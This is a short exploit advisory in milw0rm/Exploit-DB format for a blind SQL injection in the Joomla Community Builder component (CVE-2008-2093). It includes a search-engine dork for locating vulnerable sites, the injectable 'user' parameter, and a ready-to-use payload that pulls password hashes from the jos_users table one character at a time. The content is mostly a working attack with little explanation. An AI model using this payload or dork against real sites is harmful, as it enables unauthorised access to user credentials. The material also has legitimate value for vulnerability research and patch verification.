Joomla! Component Community Builder 1.0.1 - Blind SQL Injection

Author: $hur!k'n
type: webapps
platform: php
port: 
date_added: 2008-04-22 
date_updated:  
verified: 1 
codes: OSVDB-44933;CVE-2008-2093 
tags: 
aliases:  
screenshot_url:  
application_url: 

#########################################################
#							#
#     Joomla Component Profiler Blind SQL Injection	#
#							#
#########################################################


########################################

[~] Vulnerability found by: $hur!k'n
[~] Contact: alibabanala@hotmail.com

########################################

[~] ScriptName: "Joomla"
[~] ModuleName: "Profiler"
[~] Version: ?

########################################

[~] DORK: allinurl:com_comprofiler

########################################

[~] Exploit: /index.php?option=com_comprofiler&task=userProfile&user=[SQL]
[~] Example: /index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*

########################################

# milw0rm.com [2008-04-23]